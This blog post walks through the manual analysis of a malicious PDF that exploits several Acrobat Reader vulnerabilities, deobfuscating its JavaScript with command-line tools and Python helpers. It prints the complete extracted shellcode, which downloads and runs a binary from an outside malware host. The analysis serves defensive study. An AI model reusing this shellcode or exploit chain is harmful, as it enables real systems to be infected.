-->

Exploits: Analyzing a malicious PDF Document

December 21, 2009  |  Jaime Blasco

In this post, I will explain a real case example of how to manually analyze a malicious PDF document.

A few days ago I collected a malicious PDF file. Usually, Wepawet does an excellent job and automatically analyzes the malicious file for you.

In this case, Wepawet reported “No exploits were identified”, so the malicious PDF file probably uses some tricks to defeat automatic analysis.

We start by collecting some information about the PDF file:

MD5: 67f3da49ac07e6a5b3be1a743c3ea40d

To begin the analysis, we collect some information about the PDF objects using Didier Stevens' pdfid.py:

mac-jaime:pdf1 jaimeblasco$ python pdfid.py pdf.php

PDFiD 0.0.9 pdf.php

 PDF Header: %PDF-1.4

 obj                    9

 endobj                 9

 stream                 3

 endstream              3

 xref                   1

 trailer                1

 startxref              1

 /Page                  1

 /Encrypt               0

 /ObjStm                0

 /JS                    1

 /JavaScript            2

 /AA                    0

 /OpenAction            0

 /AcroForm              0

 /JBIG2Decode           0

 /RichMedia             0

 /Colors > 2^24         0
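When triaging several samples, it can help to turn this output into something we can filter. The following is a minimal sketch, not part of pdfid itself: the helper names `parse_pdfid` and `flag_suspicious` and the keyword list are assumptions chosen for illustration.

```python
import re

# Keywords that usually deserve a closer look (an illustrative choice,
# not an official pdfid list).
SUSPICIOUS = ("/JS", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
              "/JBIG2Decode", "/RichMedia")

def parse_pdfid(text):
    """Turn pdfid-style 'name   count' lines into a dict of name -> int."""
    counts = {}
    for line in text.splitlines():
        match = re.match(r"^\s*(\S.*?)\s+(\d+)\s*$", line)
        if match:
            counts[match.group(1)] = int(match.group(2))
    return counts

def flag_suspicious(counts):
    """Return the suspicious keywords that occur at least once."""
    return {name: counts[name] for name in SUSPICIOUS if counts.get(name, 0) > 0}

# A few lines copied from the pdfid output above.
sample = """
 obj                    9
 stream                 3
 /JS                    1
 /JavaScript            2
 /AA                    0
 /OpenAction            0
"""
print(flag_suspicious(parse_pdfid(sample)))
```

For this sample only /JS and /JavaScript are flagged, which matches what we go after next.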

Now we know there are some JavaScript and filter objects we should analyze. First, we search for Filter objects inside the PDF using Didier Stevens' pdf-parser.py:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --search Filter pdf.php

obj 5 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '4852'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



obj 6 0

 Type:

 Referencing:

 Contains stream

 [(1, '\n'), (2, '<<'), (1, ' '), (2, '/Length'), (1, ' '), (3, '299'), (1, ' '), (2, '/Filter'), (1, ' '), (2, '/FlateDecode'), (1, '\n '), (2, '>>'), (1, '\n')]



 <<

   /Length 299

   /Filter /FlateDecode



 >>
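Both objects use /FlateDecode, which means the stream body is zlib (deflate) compressed. As a rough sketch of what decoding such a stream involves, the snippet below inflates a buffer with Python's standard `zlib` module. The `inflate_stream` helper is a hypothetical name, and the input is a stand-in we compress ourselves, not the real stream bytes.

```python
import zlib

def inflate_stream(raw):
    """Decompress a /FlateDecode stream body (zlib/deflate data)."""
    return zlib.decompress(raw)

# Stand-in for the bytes found between 'stream' and 'endstream' in the PDF.
original = b"colkokasd assa 443562df sdfs23234266" * 3
compressed = zlib.compress(original)

decoded = inflate_stream(compressed)
print(len(compressed), "->", len(decoded), "bytes")
```

Real samples may chain several filters or use malformed streams, so a dedicated tool such as pdf-parser.py remains the safer choice.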

We have two streams that should be carefully analyzed. Let’s look at the raw data of obj 5 0:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 5 --raw --filter pdf.php | more

obj 5 0

 Type:

 Referencing:

 Contains stream



<< /Length 4852 /Filter /FlateDecode

 >>



 <<

   /Length 4852

   /Filter /FlateDecode



 >>



 colkokasd assa 443562df sdfs23234266colkokasd assa 443562df sdfs23234275colkokasd assa

443562df sdfs2323426ecolkokasd assa 443562df sdfs23234263colkokasd assa 443562df sdfs23234274colkokasd

assa 443562df sdfs

23234269colkokasd assa 443562df sdfs2323426fcolkokasd assa 443562df…......

...........

...........

...........

We have 172K of stream data, which we save for later analysis. Now we dump the obj 6 raw data:

mac-jaime:pdf1 jaimeblasco$ python pdf-parser.py --object 6 --raw --filter pdf.php | more

obj 6 0

 Type:

 Referencing:

 Contains stream



<< /Length 299 /Filter /FlateDecode

 >>



 <<

   /Length 299

   /Filter /FlateDecode



 >>

This is much better: we have JavaScript code that uses the eval and unescape functions and references this.info.title.

If we inspect info.title, we see that it is linked to the obj 5 0 data we extracted earlier.

As we can see, the JavaScript code replaces every occurrence of “colkokasd assa 443562df sdfs232342” in the obj 5 stream with the value of the variable uWReX84wKBTnU (“%”).

To emulate the JavaScript code, we first dump the obj 5 data and then use sed to perform the replacement:

python pdf-parser.py --object 5 --raw --filter pdf.php > obj5

sed -i "s/colkokasd assa 443562df sdfs232342/%/g" obj5

We create a JS file that assigns the replaced data to a variable, var JmfNzd7NdGNhf = “%66%75%6e%63%74%69%6f%6…....... ”, and then calls print(unescape(JmfNzd7NdGNhf));.

If we execute the file with SpiderMonkey:

mac-jaime:pdf1 jaimeblasco$ js obj_5.js
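The same two steps (marker replacement, then unescape) can also be reproduced without a JavaScript engine. The sketch below is one possible way to do it in Python. The helper names `js_unescape` and `deobfuscate` are assumptions, and the sample contains only the first few encoded bytes visible in the obj 5 dump above.

```python
import re

MARKER = "colkokasd assa 443562df sdfs232342"

def js_unescape(text):
    """Decode %uXXXX and %XX sequences the way JavaScript's unescape() does."""
    def decode(match):
        hex_digits = match.group(1) or match.group(2)
        return chr(int(hex_digits, 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", decode, text)

def deobfuscate(stream_text):
    """Swap the filler marker for '%' and percent-decode the result."""
    return js_unescape(stream_text.replace(MARKER, "%"))

# First encoded bytes of the obj 5 stream as shown in the dump above.
sample = "".join(MARKER + byte for byte in
                 ("66", "75", "6e", "63", "74", "69", "6f"))
print(deobfuscate(sample))
```

On this fragment the output is the beginning of the word "function", consistent with the %66%75%6e%63%74%69%6f prefix shown earlier.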

Now we have the deobfuscated JavaScript code. The PPPDDDFF() function checks the Acrobat Reader version using the app.viewerVersion property of the Adobe JavaScript API and exploits a different vulnerability depending on the version identified:

  • CVE-2007-5659: Exploiting Collab.collectEmailInfo()
  • CVE-2008-2992: Exploiting util.printf()
  • CVE-2009-0927: Exploiting Collab.getIcon()

We also found shellcode. Here is the raw data extracted using SpiderMonkey:

shellcode = "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x33\xc0\x64\x8b\x40\x30\x78\x0c\x8b\x40\x0c" \

                        "\x8b\x70\x1c\xad\x8b\x58\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x58\x3c\x6a" \

                        "\x44\x5a\xd1\xe2\x2b\xe2\x8b\xec\xeb\x4f\x5a\x52\x83\xea\x56\x89\x55\x04\x56" \

                        "\x57\x8b\x73\x3c\x8b\x74\x33\x78\x03\xf3\x56\x8b\x76\x20\x03\xf3\x33\xc9\x49" \

                        "\x50\x41\xad\x33\xff\x36\x0f\xbe\x14\x03\x38\xf2\x74\x08\xc1\xcf\x0d\x03\xfa" \

                        "\x40\xeb\xef\x58\x3b\xf8\x75\xe5\x5e\x8b\x46\x24\x03\xc3\x66\x8b\x0c\x48\x8b" \

                        "\x56\x1c\x03\xd3\x8b\x04\x8a\x03\xc3\x5f\x5e\x50\xc3\x8d\x7d\x08\x57\x52\xb8" \

                        "\x33\xca\x8a\x5b\xe8\xa2\xff\xff\xff\x32\xc0\x8b\xf7\xf2\xae\x4f\xb8\x65\x2e" \

                        "\x65\x78\xab\x66\x98\x66\xab\xb0\x6c\x8a\xe0\x98\x50\x68\x6f\x6e\x2e\x64\x68" \

                        "\x75\x72\x6c\x6d\x54\xb8\x8e\x4e\x0e\xec\xff\x55\x04\x93\x50\x33\xc0\x50\x50" \

                        "\x56\x8b\x55\x04\x83\xc2\x7f\x83\xc2\x31\x52\x50\xb8\x36\x1a\x2f\x70\xff\x55" \

                        "\x04\x5b\x33\xff\x57\x56\xb8\x98\xfe\x8a\x0e\xff\x55\x04\x57\xb8\xef\xce\xe0" \

                        "\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75" \

                        "\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70" \

                        "\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70"

The shellcode downloads a binary file from hxxp://www.inputtaiment.com/load.php?spl=pdf_exp (Mal/FakeAV-BX). Here is the analysis data:

  • VirusTotal
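The download URL can be recovered from the shellcode without disassembling it, because it is stored as plain ASCII at the end of the buffer. Below is a small sketch of a strings-style extraction. The `printable_runs` helper and the minimum length of 6 are assumptions for illustration, and only the last three lines of the shellcode above are included.

```python
import re

def printable_runs(data, min_len=6):
    """Return runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, data)]

# Trailing bytes of the shellcode, copied from the dump above.
tail = (b"\x60\xff\x55\x04\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x70\x75"
        b"\x74\x74\x61\x69\x6d\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x6c\x6f\x61\x64\x2e\x70"
        b"\x68\x70\x3f\x73\x70\x6c\x3d\x70\x64\x66\x5f\x65\x78\x70")

for run in printable_runs(tail):
    # Defang the scheme before printing so the URL is not clickable.
    print(run.replace("http", "hxxp", 1))
```

This only finds strings stored in the clear. Encoded or XOR-ed shellcode would need to be decoded or emulated first.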
